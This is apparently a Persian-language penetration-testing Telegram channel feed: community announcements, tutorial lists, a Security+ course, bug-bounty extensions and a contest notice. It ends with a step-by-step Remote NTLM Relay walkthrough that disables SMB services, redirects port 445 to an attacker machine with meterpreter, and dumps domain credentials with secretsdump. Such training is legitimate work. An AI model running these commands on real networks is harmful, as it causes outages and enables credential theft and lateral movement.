مردان همه عمـر پاره بردوخته‌اند
قوتـی به هزار حیله انــدوخته‌اند
فــردای قیامت به گنـاه ایشـان را 
شاید که نسوزند که خود سوخته‌اند.
سعدی شیرازی

⭕ خانواده بزرگ TryHackBox، حالا ۵۰۰۰ تایی شدیم!

از تک‌ تک شما که از روز اول همراه ما بودید و با حمایت ‌هاتون این جامعه رو ساختید، از صمیم قلب تشکر می‌کنم.

شما، اعضای پرشور جامعه امنیت سایبری، با اشتیاق و همدلی ‌تون به ما انگیزه دادید تا هر روز بهتر بشیم و محتوای ارزشمندتری در زمینه تست نفوذ و ردتیم با هم به اشتراک بگذاریم.
امیدوارم این خانواده روز به روز بزرگ ‌تر بشه و با هم به قله ‌های جدیدتری در دنیای امنیت سایبری برسیم!

همیشه کنار هم
تیم TryHackBox

🔖 نگاهی به آموزش های قبل :
اینبار درباره ی Adaptive Authentication Explained بخوانید ...

آسیب پذیری تصاحب حساب (Account Takeover) که ...

شناسایی کلاینت‌ها و کوکی‌ها (Client Identification and Cookies)

مقدمه: تست نفوذ چیست؟

بررسی HTTP Headers و شناسایی کاربران

XXE Cheat Sheet (2025 Update)

Active Directory attack Cheat sheet

هوش مصنوعی و امنیت کلاد

شناسایی کاربران با آدرس IP

انواع VLAN

پارت اول دامپ های حافظه LSASS
حملات XXE (تزریق XML) - بخش اول

کتاب Penetration Testing از موسسه eLearnSecurity به زبان پارسی .

حملات XXE (تزریق XML) - بخش سوم 

مقاله اجرای ماکروها از یک فایل DOCX با تزریق قالب از راه دور (Template Injection)

مهندس میلاد کهساری  - با محوریت مهندسی معکوس

حملات XXE (تزریق XML) - بخش چهارم (پایانی) 

راهکارهای امن VPN و کاربردهای آنها

ابزار  Kaveh webdiff Monitor

پارت دوم دامپ های حافظه LSASS

مقاله بایپس کردن SEHOP

تفاوت Encoding، Encryption و Hashing در یک نگاه 

راهنمای سریع ابزارهای تحلیل لاگ (Log Parsing Cheat Sheet)

تفاوت بین SSL/TLS VPN و IPsec VPN 

درک DACL

🔖 نگاهی به آموزش های قبل ۲ :

۱۰ مورد از خطرناک‌ترین روش حمله به Active Directory 

به‌کارگیری روش‌های OSINT برای آشکارسازی احساسات و مودهای افراد

پارامترهایی که می‌توانید تزریق کامند را در آنها امتحان کنید.

شازر

کوکی‌ها (Cookies) چیه و چه کاری انجام می‌دن؟

کوکی‌ها (Cookies): از شناسایی تا ذخیره اطلاعات

عملگرهای انتساب منطقی در JavaScript

۱۰ آسیب‌ پذیری برتر OWASP

۹ نکته مطالعه OSCP برای کمک به موفقیت شما توسط OffSec

Top 10 Most Dangerous Active Directory Attack Methods

مجموعه‌ای از کوئری‌ های Shodan

موضوع DLLهای مهم ویندوز

۲۷ مورد استفاده از Burp Suite برای پنتسترها

تکنیک‌ های تزریق پروسس در ویندوز

IDOR_&_HTTP_Security_Headers

ابزار ADKAVEH

Public Breach Data of Credentials

بیشتر لذت ببرید با WMI

راهنمای جامع Auto-Elevated Binaries

متن ساده - داده‌های اصلی قابل خواندن، بدون محافظت.

شکستن سپر محافظ ویندوز دیفندر با تکنیک تغییر مسیر پوشه (Folder Redirect)

هک کردن SCADA/ICS/OT با استفاده از Shodan Offensive OSINT

⭕ راهنمای جامع تزریق پروسس در لینوکس
تکنیک‌ های تزریق پروسس بخش مهمی از ابزارهای یک مهاجم هستند. این تکنیک‌ها به عوامل تهدید امکان می‌دهند تا کد مخرب را درون یک پروسس قانونی اجرا کنند تا از شناسایی شدن جلوگیری کنند یا قلاب‌هایی (hooks) در پروسس های راه دور قرار دهند تا رفتار آن‌ها را تغییر دهند.

@TryHackBox | Github | YouTube | Group
#Linux #Process #Injection

⚒️ آزمایش آسیب‌پذیری آپاچی - اسکریپت پایتون برای آزمایش آسیب‌پذیری‌های سرور HTTP آپاچی

درون PoC برای CVE-2024-38472, CVE-2024-39573, CVE-2024-38477, CVE-2024-38476, CVE-2024-38475, CVE-2024-38474, CVE-2024-38473 и CVE-2023-38709.

python3 poc_vulnerability_testing.py --target http://<target-ip>

GitHub
@TryHackBox
#tools #pentest

🔥 نمونه‌ای از چک‌ لیست برای تست نفوذ اندروید
@TryHackBox
#android #pentest

📖 Credential Dumping DCSync Attack


حمله Active Directory Credential Dumping (DCSync) تکنیکی تخصصی است که مهاجمین برای استخراج اعتبارنامه‌ها از کنترل‌کننده دامنه (DC) به‌کار می‌برند، با این روش که خود را شبیه یک کنترل‌کننده دامنه نشان می‌دهند.


راه‌اندازی یک محیط آزمایشگاهی برای شبیه ‌سازی حمله
درک پروتکل DRS و نحوه عملکرد حمله
چرایی وقوع این misconfiguration در دنیای واقعی
Exploiting از misconfiguration
نگاشت حمله به MITRE ATT&CK
Detecting حمله
استراتژی ‌های کاهش خطر
راه‌اندازی لاب (Lab Setup)

نیازمندی‌ها:
یک محیط مجازی ‌سازی (مثلاً VMware، VirtualBox یا Hyper-V).
یک Windows Server که به‌عنوان کنترل‌کننده دامنه پیکربندی شده باشد.
یک ماشین کلاینت ویندوز.
ابزارها: Impacket، Mimikatz، Netexec و Metasploit.
مراحل:
پیکربندی کنترل‌کننده دامنه:
ویندوز سرور را نصب و پیکربندی کنید تا به‌عنوان کنترل‌کننده دامنه (DC) عمل کند؛ نام دامنه را مثلاً ignite.local قرار دهید و آدرس IP را به‌صورت ایستا (static) تنظیم کنید مثلاً 192.168.1.48. AD را راه‌اندازی کنید و چند کاربر و گروه ایجاد کنید.
@KavehOffSec
@TryHackBox

#جلسه_هفتم دوره #رایگان سکوریتی پلاس | Security +

بخش : گواهی های دیجیتال

دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش می‌دهد.

برای دیدن ویدئو روی لینک زیر کلیک کنید :

https://youtu.be/4ZybmjvZSuY

انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیت‌تری ارائه بدیم،امیدواریم از آموزش لذت ببرید.


----------
🆔 @TryHackBox
----------

دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما :

@Unique_exploitbot

🔖 واژه‌نامه امنیت سایبری TryHackBox
مجموعه‌ای کاربردی از مفاهیم، اصطلاحات و واژه‌های کلیدی دنیای امنیت سایبری، مخصوص علاقه‌مندان به تست نفوذ، رد تیم و دفاع سایبری.

@TryHackBox | Github | YouTube | Group

Browser Extensions For Bug Bounty

🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه

✍️نویسنده
@TryHackBox | The Chaos

🛠 اکستنشن های کمکی برای تست نفوذ و امنیت وب

🔍 شناسایی تکنولوژی‌ها
• Wappalyzer
پروفایلر تکنولوژی - شناسایی CMS، فریمورک‌ها و کتابخانه‌های جاوااسکریپت

🎯 تست نفوذ و آنالیز
• Hackbar
افزونه تست نفوذ برای Chrome و Firefox
• OWASP Penetration Testing Kit
اسکن امنیتی برنامه‌های وب (DAST & SCA)
• KNOXSS Community Edition
ابزار کشف XSS

🔒 امنیت و اسکن آسیب‌پذیری
• Retire.js
اسکن کتابخانه‌های جاوااسکریپت آسیب‌پذیر
• Trufflehog
شناسایی خودکار API keys و credentials
• DotGit
تشخیص دایرکتوری‌های git در معرض دید
• Bishop Vulnerability Scanner
اسکنر سیستم‌های کنترل نسخه و ابزارهای ادمین

🌐 مدیریت درخواست‌ها و هدرها
• FoxyProxy
مدیریت آسان پروکسی سرور
• Modheader
تغییر هدرهای HTTP و URL
• Request Maker
ضبط، تغییر و ارسال درخواست‌های HTTP

🔎 جستجو و اوسینت
• Shodan
یافتن اطلاعات هاستینگ و پورت‌های باز
• Hunter
یافتن آدرس‌های ایمیل در وبسایت‌ها
• Mitaka
جستجوی IP، دامنه، URL و هش از طریق منو راست‌کلیک

⚡️ ابزارهای کمکی
• Open Multiple URLs
باز کردن چندین URL همزمان
• Cookie-Editor
مدیریت کوکی‌ها برای تب جاری
• S3 Bucket List
ثبت اکسپوز S3 buckets
• d3coder
انکود و دیکد متن (base64, rot13, ...)

✍️نویسنده
@TryHackBox | The Chaos
#BugBounty #Browser #Extension #Tools

🚀 آغاز مرحله مقدماتی مسابقه BlueCup

🔵 در مرحله اول این رقابت، شرکت‌کنندگان با مجموعه‌ای از چالش‌های مربوط به شناسایی حملات روبه‌رو می‌شن. شروع مسیر با سوالاتی از حوزه پاسخگویی به رخداد خواهد بود و بعد از اون باید سراغ حل چالش‌های فنی برید.

🏆 نفرات برتر این مرحله به دور بعد راه پیدا می‌کنن و در قالب گروهی رقابت می‌کنن؛ رقابت‌ها تا فینال ادامه خواهد داشت و در نهایت برترین‌ها در قالبی متفاوت به مصاف هم میرن.

📅 تاریخ برگزاری: جمعه 18 مهر
⏰ زمان: 10 صبح تا 17 (7 ساعت)
📍 محل: بخش مسابقات در پروفایل کاربری Challenginno

⚡️ نکات مهم:

برای شرکت در مسابقه نیازی به ثبت‌نام مجدد و پرداخت هزینه نیست.

کاربرانی که هنوز ثبت‌نام نکرده‌اند، تا شروع مسابقه فرصت دارن حساب خودشون رو بسازن.

سطح مسابقه: مقدماتی تا متوسط

🎁 جوایز نقدی:
🥇 نفر اول: 30 میلیون تومان
🥈 نفر دوم: 10 میلیون تومان
(در فینال امکان انتخاب حالت Raise هم وجود داره که شرایط اون اعلام خواهد شد.)

🔗 همین حالا آماده شو و وارد رقابت BlueCup بشو!

🌐 https://challenginno.ir
🌐 https://news.1rj.ru/str/challenginno

🔖 اصل قضیه: Remote NTLM Relay

⭕ امروز می‌ خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به‌ خاطر ویژگی‌ های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.

اینجا حرف از Remote NTLM Relay هست: حمله‌ای که با متوقف‌سازی اجباری سرویس‌ های SMB روی سرور و راه‌اندازی مجدد اون‌ ها کار میکنه، به‌طوری که ترافیک واردشون روی پورت 445 پس از ری‌ استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن‌ های ورودی رو به هر جایی که می‌خواد رله کنه.

برای exploiting باید چند مرحله ساده رو انجام بدیم.

💢 مرحله 1 > آماده‌ سازی سرور

برای آماده‌ سازی سرور جهت exploiting، باید سرویس‌ های SMB رو غیرفعال و سرور رو ری‌ استارت کنیم. مراحل به‌ صورت کلی اینه:

1. غیرفعال‌سازی NetLogon:

   sc stop netlogon

2. غیرفعال و متوقف‌کردن SMB Server (LanManServer):

   sc stop lanmanserver
   sc config lanmanserver start= disabled

3. توقف کامل LanManWorkstation:

   sc stop lanmanworkstation
   sc config lanmanworkstation start= disabled

این مراحل توی اسکرین‌ شات اول قابل مشاهده‌ست.
بعد از غیرفعالسازی سرویس‌ها باید ماشین رو ری‌ استارت کنیم (shutdown /r /t 0) خیلی مهمه که دستگاه ری‌ استارت بشه نه اینکه خاموش بشه.
پس از بوت شدن مجدد و به‌دست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، می‌تونیم به مرحله بعد بریم.

💢 مرحله 2 > تنظیم ماشین مهاجم

روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده می‌کنیم. در مثالی که من اجرا کردم، هدف سرور 10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی‌ ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:

proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090

💢 مرحله 3 > TCP relay با meterpreter

با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت 445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام می‌ده) فوروارد/ریدایرکت می‌ کنیم. مثال دستور:

portfwd add -R -L 10.51.124.39 -l 445 -p 445

اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می‌ بینید.

💢 مرحله 4 > Post-exploitation

بعد از اینکه رله موفق باشه، ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می‌ تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم.
در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی‌ ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامه‌ها و lateral movement در دامنه استفاده کنیم:

proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/SRV-ADMIN@10.201.126.30

چرا این وکتور کمتر رایجه؟

دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:

غیرفعال‌کردن سرویس‌ های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط‌ های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.

@TryHackBox
#AD #NTLM #Attack